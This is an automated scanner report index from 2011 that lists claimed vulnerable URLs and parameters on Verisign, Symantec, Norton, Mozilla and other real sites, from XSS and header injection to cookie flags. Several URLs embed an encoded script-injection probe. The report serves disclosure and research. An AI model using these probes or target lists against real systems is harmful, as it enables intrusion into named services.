XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09092011-01 Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. LDAP injection
1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]
1.2. http://player.ooyala.com/player.js [height parameter]
1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]
1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]
1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]
1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]
1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]
1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]
1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]
1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]
1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]
1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]
2. HTTP header injection
2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]
2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]
2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]
2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]
2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]
3. Cross-site scripting (reflected)
3.1. https://cert.webtrust.org/ViewSeal [id parameter]
3.2. http://com-verisign.netmng.com/ [height parameter]
3.3. http://com-verisign.netmng.com/ [width parameter]
3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]
3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]
3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]
3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]
3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]
3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]
3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]
3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]
3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]
3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]
3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]
3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]
3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]
3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]
3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]
3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]
3.22. http://player.ooyala.com/player.js [playerId parameter]
3.23. http://player.ooyala.com/player.js [wmode parameter]
3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]
3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]
3.26. http://updatecenter.norton.com/ [NUCLANG parameter]
3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]
3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]
3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]
3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]
3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]
3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]
3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]
3.34. http://www.symantec.com/s/searchg/suggest [q parameter]
3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]
4. Flash cross-domain policy
4.1. http://ak.c.ooyala.com/crossdomain.xml
4.2. http://cp76677.edgefcs.net/crossdomain.xml
4.3. http://mbox3.offermatica.com/crossdomain.xml
4.4. http://om.symantec.com/crossdomain.xml
4.5. http://player.ooyala.com/crossdomain.xml
4.6. https://symantec-corporation.com/crossdomain.xml
4.7. http://symantec.tt.omtrdc.net/crossdomain.xml
4.8. http://ch.norton.com/crossdomain.xml
4.9. http://l.player.ooyala.com/crossdomain.xml
4.10. http://us.norton.com/crossdomain.xml
4.11. https://us.norton.com/crossdomain.xml
4.12. https://www-secure.symantec.com/crossdomain.xml
4.13. http://www.symantec.com/crossdomain.xml
4.14. http://1168.ic-live.com/crossdomain.xml
4.15. https://drh.img.digitalriver.com/crossdomain.xml
4.16. http://twitter.com/crossdomain.xml
4.17. http://www.verisign.com/crossdomain.xml
4.18. https://www.verisign.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://om.symantec.com/clientaccesspolicy.xml
5.2. http://player.ooyala.com/clientaccesspolicy.xml
6. SSL cookie without secure flag set
6.1. https://admin.instantservice.com/Customer
6.2. https://admin.instantservice.com/links/5851/14753
6.3. https://admin.instantservice.com/links/5851/16144
6.4. https://admin.instantservice.com/links/5851/16145
6.5. https://admin.instantservice.com/links/5851/39897
6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs
6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch
6.8. https://securitycenter.verisign.com/celp/enroll/retail
6.9. https://securitycenter.verisign.com/celp/enroll/upsell
6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs
6.11. https://renewals.symantec.com/renewals/application
6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login
6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login
6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
6.17. https://trust-center.verisign.ch/process/retail/console_login
6.18. https://trust-center.verisign.ch/process/retail/trust_initial
6.19. https://trust-center.verisign.com/favicon.ico
6.20. https://trust-center.verisign.com/process/retail/console_login
6.21. https://trust-center.verisign.com/process/retail/help_and_support
6.22. https://trust-center.verisign.com/process/retail/redirect
6.23. https://trust-center.verisign.com/process/retail/session_timeout
6.24. https://trust-center.verisign.com/process/retail/trust_initial
6.25. https://trust-center.verisign.com/process/retail/trust_product_selector
6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do
6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css
6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css
6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js
6.67. https://www4.symantec.com/Vrt/wl
7. Session token in URL
7.1. https://idprotect.verisign.com/images/favicon.ico
7.2. https://idprotect.verisign.com/kaptcha.jpg
7.3. https://idprotect.verisign.com/scripts/global.js
7.4. https://idprotect.verisign.com/toolbar/activate.v
7.5. http://m.verisign.com/home.v
7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard
7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image
7.8. http://player.ooyala.com/sas/authorized
7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif
7.10. http://sales.liveperson.net/hc/2735064/
7.11. https://securitycenter.verisign.com/celp/enroll/retail
7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
7.13. https://trust-center.verisign.com/process/retail/trust_product_selector
7.14. http://vipmobile.verisign.com/images/favicon.ico
7.15. https://vipmobile.verisign.com/home.v
8. SSL certificate
8.1. https://fileconnect.symantec.com/
8.2. https://forms.verisign.com/
8.3. https://knowledge.verisign.ch/
8.4. https://knowledge.verisign.com/
8.5. https://onlinefamily.norton.com/
8.6. https://query.verisign.com/
8.7. https://ssl-certificate-center.verisign.ch/
8.8. https://ssl-certificate-center.verisign.com/
8.9. https://trust-center.verisign.ch/
8.10. https://trust-center.verisign.com/
8.11. https://us.norton.com/
8.12. https://admin.instantservice.com/
8.13. https://buy-static.norton.com/
8.14. https://cdn.verisign.com/
8.15. https://cert.webtrust.org/
8.16. https://donate.mozilla.org/
8.17. https://drh.img.digitalriver.com/
8.18. https://enterprise-ssl-admin.verisign.com/
8.19. https://idprotect.verisign.com/
8.20. https://partnernet.symantec.com/
8.21. https://policy3.responsys.net/
8.22. https://press.verisign.com/
8.23. https://products.geotrust.com/
8.24. https://products.verisign.com/
8.25. https://renewals.symantec.com/
8.26. https://seal.verisign.com/
8.27. https://securitycenter.verisign.com/
8.28. https://symaccount.symantec.com/
8.29. https://symantec-corporation.com/
8.30. https://test-products.verisign.com/
8.31. https://vipdeveloper.verisign.com/
8.32. https://vipmanager.verisign.com/
8.33. https://vipmobile.verisign.com/
8.34. https://vs.symantec.com/
8.35. https://www-secure.symantec.com/
8.36. https://www.verisign.com/
8.37. https://www4.symantec.com/
9. Cookie scoped to parent domain
9.1. http://buy.norton.com/
9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
9.6. http://buy.norton.com/estore/mf/landingProductFeatures
9.7. http://buy.norton.com/estore/mf/landingPromotion
9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
9.10. http://buy.norton.com/estore/mf/upgradeCenter
9.11. http://buy.norton.com/estore/mf/upgradeRenewal
9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard
9.15. http://buy.norton.com/
9.16. http://buy.norton.com/ps
9.17. http://buy.norton.com/special-promotions
9.18. http://buy.norton.com/support
9.19. http://buy.norton.com/upgrades-renewals
9.20. http://buy.symanteccloud.com/freetrial
9.21. http://buy.symanteccloud.com/smbstore
9.22. http://free.pctools.com/res/js/utils.php
9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard
9.24. http://sales.liveperson.net/hc/2735064/
9.25. http://sales.liveperson.net/hc/71097838/
9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login
9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login
9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
9.31. https://trust-center.verisign.ch/process/retail/console_login
9.32. https://trust-center.verisign.ch/process/retail/trust_initial
9.33. https://trust-center.verisign.com/favicon.ico
9.34. https://trust-center.verisign.com/process/retail/console_login
9.35. https://trust-center.verisign.com/process/retail/help_and_support
9.36. https://trust-center.verisign.com/process/retail/redirect
9.37. https://trust-center.verisign.com/process/retail/session_timeout
9.38. https://trust-center.verisign.com/process/retail/trust_initial
9.39. https://trust-center.verisign.com/process/retail/trust_product_selector
9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do
9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css
9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css
9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif
9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js
10. Cookie without HttpOnly flag set
10.1. https://admin.instantservice.com/Customer
10.2. https://admin.instantservice.com/links/5851/14753
10.3. https://admin.instantservice.com/links/5851/16144
10.4. https://admin.instantservice.com/links/5851/16145
10.5. https://admin.instantservice.com/links/5851/39897
10.6. http://buy.norton.com/
10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
10.11. http://buy.norton.com/estore/mf/landingProductFeatures
10.12. http://buy.norton.com/estore/mf/landingPromotion
10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
10.15. http://buy.norton.com/estore/mf/upgradeCenter
10.16. http://buy.norton.com/estore/mf/upgradeRenewal
10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
10.19. http://buy.norton.com/upgrades-renewals
10.20. https://idprotect.verisign.com/toolbar/activate.v
10.21. http://m.verisign.com/
10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard
10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
10.24. https://products.verisign.com/geocenter/reseller/doregister.do
10.25. https://products.verisign.com/geocenter/reseller/logon.do
10.26. https://products.verisign.com/geocenter/reseller/register.do
10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
10.28. https://securitycenter.verisign.com/celp/enroll/retail
10.29. https://securitycenter.verisign.com/celp/enroll/upsell
10.30. https://trust-center.verisign.com/process/retail/session_timeout
10.31. http://us.norton.com/beta/index.jsp
10.32. http://us.norton.com/beta/overview.jsp
10.33. http://vipmobile.verisign.com/fpa/fpa.jsp
10.34. http://vipmobile.verisign.com/images/b_shadow.png
10.35. http://vipmobile.verisign.com/images/bl_shadow.png
10.36. http://vipmobile.verisign.com/images/br_shadow.png
10.37. http://vipmobile.verisign.com/images/dot.gif
10.38. http://vipmobile.verisign.com/images/home_rght_box.gif
10.39. http://vipmobile.verisign.com/images/r_shadow.png
10.40. http://vipmobile.verisign.com/images/rt_shadow.png
10.41. http://vipmobile.verisign.com/images/topleft.gif
10.42. https://vipmobile.verisign.com/fpa/fpa.jsp
10.43. http://buy.norton.com/
10.44. http://buy.norton.com/ps
10.45. http://buy.norton.com/special-promotions
10.46. http://buy.norton.com/support
10.47. http://buy.symanteccloud.com/freetrial
10.48. http://buy.symanteccloud.com/smbstore
10.49. http://com-verisign.netmng.com/
10.50. http://com-verisign.netmng.com//
10.51. http://free.pctools.com/res/js/utils.php
10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard
10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs
10.54. http://renewals.symantec.com/renewals/application
10.55. https://renewals.symantec.com/renewals/application
10.56. http://sales.liveperson.net/hc/2735064/
10.57. http://sales.liveperson.net/hc/2735064/
10.58. http://sales.liveperson.net/hc/2735064/
10.59. http://sales.liveperson.net/hc/71097838/
10.60. http://sales.liveperson.net/hc/71097838/
10.61. http://sales.liveperson.net/hc/71097838/
10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login
10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login
10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
10.67. https://trust-center.verisign.ch/process/retail/console_login
10.68. https://trust-center.verisign.ch/process/retail/trust_initial
10.69. https://trust-center.verisign.com/favicon.ico
10.70. https://trust-center.verisign.com/process/retail/console_login
10.71. https://trust-center.verisign.com/process/retail/help_and_support
10.72. https://trust-center.verisign.com/process/retail/redirect
10.73. https://trust-center.verisign.com/process/retail/trust_initial
10.74. https://trust-center.verisign.com/process/retail/trust_product_selector
10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do
10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css
10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css
10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif
10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js
10.118. https://www4.symantec.com/Vrt/wl
11. Password field with autocomplete enabled
11.1. http://blogs.verisign.com/
11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html
11.4. https://knowledge.verisign.ch/support/mpki-support/index.html
11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index
11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html
11.8. https://knowledge.verisign.com/support/code-signing-support/index
11.9. https://knowledge.verisign.com/support/code-signing-support/index.html
11.10. https://knowledge.verisign.com/support/digital-id-support/index.html
11.11. https://knowledge.verisign.com/support/eca-support/index.html
11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
11.14. https://knowledge.verisign.com/support/mpki-support/index.html
11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index
11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html
11.18. https://products.verisign.com/geocenter/reseller/logon.do
11.19. https://products.verisign.com/geocenter/reseller/logon.jsp
11.20. https://products.verisign.com/geocenter/reseller/register.do
11.21. http://query.verisign.ch/search
11.22. http://query.verisign.com/search
11.23. https://query.verisign.com/search
11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login
11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login
11.26. https://test-products.verisign.com/geocenter/reseller/logon.do
11.27. https://trust-center.verisign.ch/process/retail/console_login
11.28. https://trust-center.verisign.com/process/retail/console_login
11.29. http://www.verisign.ch/
11.30. http://www.verisign.ch/contact-information/index.html
11.31. http://www.verisign.ch/corporate/index.html
11.32. http://www.verisign.ch/trust-seal/index.html
11.33. http://www.verisign.com/
11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
11.35. http://www.verisign.com/code-signing/index.html
11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html
11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
11.40. http://www.verisign.com/trust-seal/index.html
11.41. http://www.verisign.com/verisign-worldwide/index.html
11.42. https://www.verisign.com/
11.43. https://www.verisign.com/products-services/index.html
12. Referer-dependent response
12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png
12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png
12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png
12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png
12.7. http://sales.liveperson.net/hc/2735064/
13. Cross-domain POST
